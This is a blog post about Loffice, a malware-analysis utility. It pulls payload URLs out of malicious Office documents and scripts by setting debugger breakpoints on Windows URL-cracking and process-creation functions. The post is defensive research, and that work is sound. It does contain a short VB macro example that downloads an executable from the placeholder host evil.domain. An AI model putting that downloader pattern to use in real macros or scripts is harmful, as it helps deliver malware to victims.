Sunday, 5 June 2016

Loffice - Analyzing malicious documents using WinDbg

UPDATE: An updated version of loffice is available; details on the update are available here.

I found myself analyzing a large number of malicious Office documents and Javascript "documents". Since the only thing I needed from them was the payload URL, the manual analysis had to be automated to make it more efficient.

In the beginning I deobfuscated the documents by hand with the help of some scripting, but having seen the same type of documents over and over again I found myself just running the macro and extracting the URL from memory. Still, that was more manual work than I thought was needed, and I figured there must be a better, more controllable way.

Now, the result of this isn't really a new framework or package like oletools. Rather than analyzing the file itself, I'm taking a different approach that puts obfuscation out of play. It is inspired by dynamic analysis and debugging of regular malware executables.


Analysis beyond the document

VB macros and Javascript can use, for example, MSXML2.XMLHTTP to interact with remote resources. This happens at a higher level than calling the WinAPI directly.

Set httpObject = CreateObject("MSXML2.XMLHTTP")
httpObject.Open "GET", "http://evil.domain/1.exe", False
httpObject.send


The above is very simple, but all of the magic responsible for making the actual HTTP request happens behind the scenes. One of the things done there is breaking the URL down into its base components, such as hostname and path, before it can be used by Windows internal functions in, for example, WinInet.

MSXML2.XMLHTTP is built upon URLMon, which relies on WinInet. WinInet has a function for "cracking" a URL into its base components called InternetCrackUrl. Before a URL is retrieved it needs to be cracked, which means that obfuscation plays a much smaller role in the analysis: the deobfuscation has already taken place by the time InternetCrackUrl is called.

So rather than attacking the document at the script level, we're attacking it at a lower level with a debugger. Let's look at an example of how this works in practice.
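To make the idea of "cracking" a bit more concrete, here is a small Python sketch. It uses urllib.parse.urlsplit from the standard library as a stand-in for InternetCrackUrl (it is not the WinInet call), and the reversed-and-split "obfuscation" is made up for illustration. The only point is that whatever the script does to hide the URL, the cracking step gets to see it in the clear.

```python
from urllib.parse import urlsplit

# Made-up obfuscation for illustration: the URL is stored reversed, in pieces.
OBFUSCATED_PIECES = ["exe.1/niam", "od.live//:ptth"]


def deobfuscate(pieces):
    """Undo the toy obfuscation: join the pieces, then reverse the string."""
    return "".join(pieces)[::-1]


def crack_url(url):
    """Split a URL into base components, roughly what a 'crack' step produces."""
    parts = urlsplit(url)
    return {"scheme": parts.scheme, "host": parts.hostname, "path": parts.path}


# The script has to rebuild the real URL before it can hand it over,
# so the cracking step never sees the obfuscated form.
cracked = crack_url(deobfuscate(OBFUSCATED_PIECES))
print(cracked)
```

Watching the input of the cracking step is therefore enough; the pieces and the reversing never need to be understood.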

WinDbg is the weapon of choice. For this example I'm using a malicious Word document from one of the Dridex campaigns. After launching Word, attaching WinDbg and setting a breakpoint on InternetCrackUrlW, it's not long before the breakpoint is hit once macros are enabled in the document.



With execution halted on the first instruction of InternetCrackUrlW, the parameters to the function are available on the stack, including the URL. The URL is the first argument passed, and the pointer to it is found at ESP+4 (as I'm running on 32-bit).
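Why ESP+4? At the first instruction of a 32-bit function, ESP points at the return address and the arguments follow right after it. The sketch below simulates that layout in a plain bytearray, with no debugger involved. The addresses and the fake return address are arbitrary values picked for the example.

```python
import struct


def read_dword(memory, address):
    """Read a little-endian 32-bit value from the simulated memory."""
    return struct.unpack_from("<I", memory, address)[0]


def read_wide_string(memory, address):
    """Read a NUL-terminated UTF-16LE string starting at address."""
    end = address
    while memory[end:end + 2] != b"\x00\x00":
        end += 2
    return memory[address:end].decode("utf-16-le")


def first_argument_url(memory, esp):
    """Follow the pointer stored at ESP+4 and read the wide string it points to."""
    url_pointer = read_dword(memory, esp + 4)
    return read_wide_string(memory, url_pointer)


# Build a tiny fake address space (all addresses are arbitrary).
memory = bytearray(0x100)
esp = 0x10
url_address = 0x40
struct.pack_into("<I", memory, esp, 0x77001234)       # [ESP]   fake return address
struct.pack_into("<I", memory, esp + 4, url_address)  # [ESP+4] pointer to the URL
encoded = "http://evil.domain/1.exe".encode("utf-16-le") + b"\x00\x00"
memory[url_address:url_address + len(encoded)] = encoded

print(first_argument_url(memory, esp))
```

The string is read as UTF-16 because the breakpoint is on the W (wide) variant of the function.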




So basically, without having to deobfuscate any code or upload the document to a sandbox, we've found a URL pointing to an executable that can be used for further analysis.


Loffice - Lazy Office Analyzer

The beauty of this approach is that it can be scripted: there is a Python module for debugging and instrumenting Windows processes called WinAppDbg. If you haven't heard of it or used it, I highly recommend looking into it; it's extremely useful.

What's essentially needed is to set a breakpoint on InternetCrackUrl as soon as wininet.dll is loaded into memory, and to read the URL when the breakpoint is hit.

So I wrote a utility (Loffice) that makes use of this technique. It also sets breakpoints on a few other functions such as CreateFileW and CreateProcessW. These enable extraction of the path a file will be written to and show whether any new processes are about to be launched.

WinInet isn't the only library that can be used to interact with a URL from macros and scripts. There is also WinHTTP, which is covered via WinHttpCrackUrl, so both WinHTTP- and WinInet-based URL fetching are handled.
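A minimal sketch of that idea with WinAppDbg could look like the following. This is not the loffice source, just an illustration for 32-bit targets. The WinAppDbg calls (EventHandler.load_dll, Module.match_name, Module.resolve, Debug.break_at, Thread.read_stack_dwords, Process.peek_string) are written from my reading of its documentation, so check them against the version you have installed. The function and class names are my own.

```python
WATCHED_DLL = "wininet.dll"
WATCHED_API = "InternetCrackUrlW"


def read_url_argument(event):
    """Return the wide-string URL passed as the first argument (32-bit only)."""
    thread = event.get_thread()
    process = event.get_process()
    # At function entry [ESP] is the return address, [ESP+4] the first argument.
    _return_address, url_pointer = thread.read_stack_dwords(2)
    return process.peek_string(url_pointer, fUnicode=True)


def on_crack_url(event):
    """Breakpoint callback: print the URL, then let execution continue."""
    print(read_url_argument(event))


def make_handler():
    """Build the event handler; winappdbg is imported lazily (Windows only)."""
    from winappdbg import EventHandler

    class CrackUrlHandler(EventHandler):
        def load_dll(self, event):
            # Called for every DLL load; arm the breakpoint once wininet shows up.
            module = event.get_module()
            if module.match_name(WATCHED_DLL):
                address = module.resolve(WATCHED_API)
                event.debug.break_at(event.get_pid(), address, on_crack_url)

    return CrackUrlHandler()


def main(argv):
    """Launch argv (for example Word plus a document path) under the debugger."""
    from winappdbg import Debug

    debug = Debug(make_handler(), bKillOnExit=True)
    try:
        debug.execv(argv)
        debug.loop()
    finally:
        debug.stop()
```

Calling main() with the path to the host application and the sample, inside an isolated analysis machine, would start the application under the debugger and print each URL as it is cracked.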
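One way to picture the set of watched functions is a small lookup table: which DLL exports the function, and which argument holds the interesting string. The table below is my own sketch, not lifted from loffice. The argument positions follow the documented Windows prototypes (URL first for InternetCrackUrlW and WinHttpCrackUrl, file name first for CreateFileW, command line second for CreateProcessW); the labels and helper names are hypothetical.

```python
# (dll, function) -> (label, zero-based index of the interesting argument)
WATCHED_APIS = {
    ("wininet.dll", "InternetCrackUrlW"): ("url", 0),    # lpszUrl
    ("winhttp.dll", "WinHttpCrackUrl"): ("url", 0),      # pwszUrl
    ("kernel32.dll", "CreateFileW"): ("file", 0),        # lpFileName
    ("kernel32.dll", "CreateProcessW"): ("process", 1),  # lpCommandLine
}


def stack_offset(arg_index, pointer_size=4):
    """Offset from ESP at function entry for a 32-bit stdcall argument."""
    # Slot 0 on the stack is the return address, so arguments start one slot in.
    return pointer_size * (arg_index + 1)


def describe_hit(dll, function, args):
    """Return (label, value) for a breakpoint hit, given the decoded arguments."""
    label, index = WATCHED_APIS[(dll.lower(), function)]
    return label, args[index]


print(stack_offset(0))  # first argument, as with InternetCrackUrlW
print(describe_hit("KERNEL32.DLL", "CreateProcessW", [None, "powershell.exe -enc ..."]))
```

Keeping this in one table means adding another function to watch is a one-line change.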

To make it more dynamic I added some options on how loffice should behave when hitting a breakpoint.


Running loffice on a Word document and a Javascript "document":



One thing to note is that if loffice is told to exit on the first URL extraction, it will also exit if a new process is created. This makes sure that control over the execution isn't lost to another process when no URLs are found in the document.

Later on I'll look into using hooks instead of breakpoints, to be able to control the results of HTTP-related calls. That would give a higher chance of extracting all of the URLs in a document/script instead of only the first. This is useful when a document only moves on to the next URL if the first one fails.
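The exit rule can be written down in a few lines. This is only a sketch of the behaviour described above; the hit labels ("url", "file", "process") and the function names are hypothetical and not taken from loffice.

```python
def should_exit(hit_kind, exit_on_url):
    """Return True if the debugger should stop after this breakpoint hit."""
    if not exit_on_url:
        return False
    # A new process counts too, so control is not lost to a child process.
    return hit_kind in ("url", "process")


def run(hits, exit_on_url):
    """Process hits in order and return those handled before stopping."""
    handled = []
    for kind, value in hits:
        handled.append((kind, value))
        if should_exit(kind, exit_on_url):
            break
    return handled


hits = [
    ("file", "C:\\Temp\\a.tmp"),
    ("process", "powershell.exe -enc ..."),
    ("url", "http://evil.domain/1.exe"),
]
print(run(hits, exit_on_url=True))
```

With exit_on_url set, the run stops at the process creation and never reaches the URL; without it, all three hits are handled.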
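To show why controlling the result matters, here is a toy simulation with no debugger involved. macro_downloader stands in for a macro that tries its URLs in order and stops at the first successful fetch. The second URL is invented for the example.

```python
def macro_downloader(urls, fetch):
    """Toy stand-in for a macro: try each URL until one fetch succeeds."""
    for url in urls:
        if fetch(url):
            return url
    return None


def observe(urls, forced_result):
    """Record every URL the downloader asks for while forcing the fetch result."""
    seen = []

    def fetch(url):
        seen.append(url)
        return forced_result

    macro_downloader(urls, fetch)
    return seen


urls = ["http://evil.domain/1.exe", "http://backup.domain/1.exe"]
print(observe(urls, forced_result=True))   # fetch succeeds: only the first URL shows up
print(observe(urls, forced_result=False))  # fetch forced to fail: every URL shows up
```

A breakpoint can only watch the first case, while a hook that makes the request fail pushes the macro through its whole list.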

Summary

So this isn't really a stand-alone tool for static analysis, but rather a utility for applying controlled dynamic analysis to documents and scripts.

Rather than having to keep up with (de)obfuscation techniques, update scripts or deobfuscate manually, it's possible to let the host application do all the deobfuscation and take over when the interesting stuff, such as HTTP requests, is about to happen.

This does, as you might have figured out, rely on WinDbg and Microsoft Office. It is only supported on 32-bit systems (for now).

This initial version is basically a proof of concept that I will continue to work on. If you've got any thoughts/comments/suggestions, let me know.

Small update on the project

So after some time I got around to putting some more work into this. The above details the background of the project. Since then I've added support for detecting and bypassing some anti-analysis done via WMI, and also for exiting on process creation via WMI, which should now cover the most common ways of creating processes from macros/scripts.

Loffice now supports 64-bit as well. I do however recommend that you don't mix winappdbg and Python versions (32/64-bit); this is a warning from the winappdbg developer.

Loffice is available on Github.

3 comments:

  1. Thank you so much. This is exceptionally useful. Have you thought about Office with PowerShell commands? Can we use WinDbg in this case?

    Replies
    1. Glad that it's of use. Do I understand you correctly that you mean launching PowerShell from Office documents? This is covered, as launching PowerShell from an Office macro would call CreateProcess. In that case you would get the command line used for launching PowerShell, such as the long base64-encoded PowerShell script commonly seen.
